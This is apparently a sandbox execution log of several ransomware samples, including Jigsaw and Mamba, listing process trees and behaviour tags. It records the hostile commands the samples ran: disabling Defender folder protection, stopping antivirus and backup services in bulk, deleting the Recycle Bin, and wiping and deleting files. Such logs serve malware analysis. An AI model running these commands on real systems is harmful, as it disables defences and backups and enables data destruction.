C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4628 /prefetch:12⤵PID:4080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:12⤵PID:1196
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵PID:1420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6484 /prefetch:82⤵PID:2612
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7016 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6640 /prefetch:12⤵PID:760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6340 /prefetch:82⤵PID:3620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5352 /prefetch:82⤵PID:3260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6996 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:1916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:12⤵PID:1312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵PID:1632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6452 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5952 /prefetch:12⤵PID:6472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2232,5507560893636862681,9893145803666023862,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5988 /prefetch:82⤵PID:6240
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3628
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3728
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5092
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2672
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2612
-
C:\Users\Admin\Desktop\jigsaw.exe"C:\Users\Admin\Desktop\jigsaw.exe"1⤵
- Adds Run key to start application
PID:3704 -
C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe"C:\Users\Admin\AppData\Local\Drpbx\drpbx.exe" C:\Users\Admin\Desktop\jigsaw.exe2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4596
-
-
C:\Users\Admin\Desktop\jigsaw.exe"C:\Users\Admin\Desktop\jigsaw.exe"1⤵
- Adds Run key to start application
PID:868
-
C:\Users\Admin\Desktop\jigsaw.exe"C:\Users\Admin\Desktop\jigsaw.exe"1⤵
- Adds Run key to start application
PID:4456
-
C:\Users\Admin\Desktop\jigsaw.exe"C:\Users\Admin\Desktop\jigsaw.exe"1⤵
- Adds Run key to start application
PID:1648
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\a14243c3737244cd84d5c8b3ddf2172a /t 2216 /p 45961⤵PID:1776
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.Mamba.zip\131.exe"1⤵
- System Location Discovery: System Language Discovery
PID:4044
-
C:\Users\Admin\Desktop\131.exe"C:\Users\Admin\Desktop\131.exe"1⤵
- System Location Discovery: System Language Discovery
PID:3400
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
PID:828
-
C:\Users\Admin\Desktop\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"C:\Users\Admin\Desktop\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe"1⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1728 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:412
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop avpsus /y2⤵PID:920
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵
- System Location Discovery: System Language Discovery
PID:5528
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:4796
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:5344
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop mfewc /y2⤵PID:3612
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:5624
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BMR Boot Service /y2⤵
- System Location Discovery: System Language Discovery
PID:2932 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵
- System Location Discovery: System Language Discovery
PID:5796
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵
- System Location Discovery: System Language Discovery
PID:2404 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵
- System Location Discovery: System Language Discovery
PID:5812
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop DefWatch /y2⤵
- System Location Discovery: System Language Discovery
PID:3064 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵
- System Location Discovery: System Language Discovery
PID:5668
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:2976
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵
- System Location Discovery: System Language Discovery
PID:5804
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop ccSetMgr /y2⤵PID:3292
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵
- System Location Discovery: System Language Discovery
PID:5312
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop SavRoam /y2⤵PID:4588
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵
- System Location Discovery: System Language Discovery
PID:5616
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop RTVscan /y2⤵
- System Location Discovery: System Language Discovery
PID:4972 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5956
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBFCService /y2⤵PID:644
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:5700
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBIDPService /y2⤵
- System Location Discovery: System Language Discovery
PID:3436 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵
- System Location Discovery: System Language Discovery
PID:6080
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:5992
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:4456
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:5892
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooBackup /y2⤵
- System Location Discovery: System Language Discovery
PID:4784 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:5772
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop YooIT /y2⤵
- System Location Discovery: System Language Discovery
PID:3516 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵
- System Location Discovery: System Language Discovery
PID:6000
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:468
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:5904
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:3724
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵
- System Location Discovery: System Language Discovery
PID:6036
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VSNAPVSS /y2⤵
- System Location Discovery: System Language Discovery
PID:2348 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵
- System Location Discovery: System Language Discovery
PID:5684
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamTransportSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:4816 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:5936
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamDeploymentService /y2⤵
- System Location Discovery: System Language Discovery
PID:2480 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5756
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop VeeamNFSSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:1496 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:5632
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop veeam /y2⤵
- System Location Discovery: System Language Discovery
PID:4296 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵
- System Location Discovery: System Language Discovery
PID:5788
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop PDVFSService /y2⤵
- System Location Discovery: System Language Discovery
PID:1344 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:6008
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵
- System Location Discovery: System Language Discovery
PID:5052 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵
- System Location Discovery: System Language Discovery
PID:6072
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵
- System Location Discovery: System Language Discovery
PID:4084 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵
- System Location Discovery: System Language Discovery
PID:6132
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵
- System Location Discovery: System Language Discovery
PID:3156 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:6016
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵
- System Location Discovery: System Language Discovery
PID:1760 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵
- System Location Discovery: System Language Discovery
PID:5964
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecJobEngine /y2⤵
- System Location Discovery: System Language Discovery
PID:2896 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵
- System Location Discovery: System Language Discovery
PID:5912
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:4908
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:5676
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop BackupExecRPCService /y2⤵
- System Location Discovery: System Language Discovery
PID:2176 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:5780
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcrSch2Svc /y2⤵
- System Location Discovery: System Language Discovery
PID:3840 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:5828
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop AcronisAgent /y2⤵
- System Location Discovery: System Language Discovery
PID:2328 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵
- System Location Discovery: System Language Discovery
PID:6028
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:3012 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:6060
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop CAARCUpdateSvc /y2⤵
- System Location Discovery: System Language Discovery
PID:2112 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop CAARCUpdateSvc /y3⤵
- System Location Discovery: System Language Discovery
PID:2476
-
-
-
C:\Windows\SysWOW64\net.exe"net.exe" stop sophos /y2⤵
- System Location Discovery: System Language Discovery
PID:3508 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop sophos /y3⤵PID:1184
-
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵
- Launches sc.exe
PID:4580
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1600
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SQLWriter start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2748
-
-
C:\Windows\SysWOW64\sc.exe"sc.exe" config SstpSvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1156
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2408
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5040
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin2⤵
- System Location Discovery: System Language Discovery
PID:1692
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp96D4.bat2⤵
- System Location Discovery: System Language Discovery
PID:5880
-
-
C:\Windows\SysWOW64\notepad.exe"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt2⤵
- System Location Discovery: System Language Discovery
- Opens file in notepad (likely ransom note)
PID:7076
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”2⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:7088 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.7 -n 33⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6068
-
-
C:\Windows\SysWOW64\fsutil.exefsutil file setZeroData offset=0 length=524288 “%s”3⤵
- System Location Discovery: System Language Discovery
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d.exe2⤵PID:7108
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 33⤵
- System Location Discovery: System Language Discovery
PID:5828
-
-
-
C:\Users\Admin\Desktop\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"C:\Users\Admin\Desktop\58bfb9fa8889550d13f42473956dc2a7ec4f3abb18fd3faeaa38089d513c171f.exe"1⤵
- Modifies Windows Defender Real-time Protection settings
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5060
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop avpsus /y2⤵PID:3256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y3⤵PID:6716
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop McAfeeDLPAgentService /y2⤵PID:6016
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y3⤵PID:4604
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop mfewc /y2⤵PID:1776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y3⤵PID:6816
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BMR Boot Service /y2⤵PID:5684
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y3⤵PID:6828
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop NetBackup BMR MTFTP Service /y2⤵PID:976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y3⤵PID:3968
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop DefWatch /y2⤵PID:5628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop DefWatch /y3⤵PID:4492
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccEvtMgr /y2⤵PID:4000
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccEvtMgr /y3⤵PID:3184
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop ccSetMgr /y2⤵PID:2456
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ccSetMgr /y3⤵PID:3276
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop SavRoam /y2⤵PID:2244
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SavRoam /y3⤵PID:6912
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop RTVscan /y2⤵PID:4796
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop RTVscan /y3⤵PID:5860
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBFCService /y2⤵PID:6096
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBFCService /y3⤵PID:1788
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBIDPService /y2⤵PID:4332
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBIDPService /y3⤵PID:6224
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop Intuit.QuickBooks.FCS /y2⤵PID:4668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y3⤵PID:4804
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop QBCFMonitorService /y2⤵PID:5112
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop QBCFMonitorService /y3⤵PID:6592
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooBackup /y2⤵PID:5776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooBackup /y3⤵PID:6876
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop YooIT /y2⤵PID:5624
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop YooIT /y3⤵PID:2892
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop zhudongfangyu /y2⤵PID:6108
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop zhudongfangyu /y3⤵PID:7144
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop stc_raw_agent /y2⤵PID:6128
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop stc_raw_agent /y3⤵PID:2392
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VSNAPVSS /y2⤵PID:5652
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VSNAPVSS /y3⤵PID:6948
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamTransportSvc /y2⤵PID:2340
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamTransportSvc /y3⤵PID:6232
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamDeploymentService /y2⤵PID:3400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamDeploymentService /y3⤵PID:5832
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop VeeamNFSSvc /y2⤵PID:552
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop VeeamNFSSvc /y3⤵PID:736
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop veeam /y2⤵PID:2608
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop veeam /y3⤵PID:1268
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop PDVFSService /y2⤵PID:6140
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop PDVFSService /y3⤵PID:7112
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecVSSProvider /y2⤵PID:5372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecVSSProvider /y3⤵PID:220
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentAccelerator /y2⤵PID:5700
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentAccelerator /y3⤵PID:7164
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecAgentBrowser /y2⤵PID:5804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecAgentBrowser /y3⤵PID:792
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecDiveciMediaService /y2⤵PID:5792
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecDiveciMediaService /y3⤵PID:7156
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecJobEngine /y2⤵PID:3156
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecJobEngine /y3⤵PID:2916
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecManagementService /y2⤵PID:4596
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecManagementService /y3⤵PID:6980
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop BackupExecRPCService /y2⤵PID:5672
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BackupExecRPCService /y3⤵PID:7000
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcrSch2Svc /y2⤵PID:5400
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcrSch2Svc /y3⤵PID:7072
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop AcronisAgent /y2⤵PID:3740
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop AcronisAgent /y3⤵PID:6452
-
-
-
C:\Windows\SYSTEM32\net.exe"net.exe" stop CASAD2DWebSvc /y2⤵PID:5508
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop CASAD2DWebSvc /y3⤵PID:6776
-
-
-
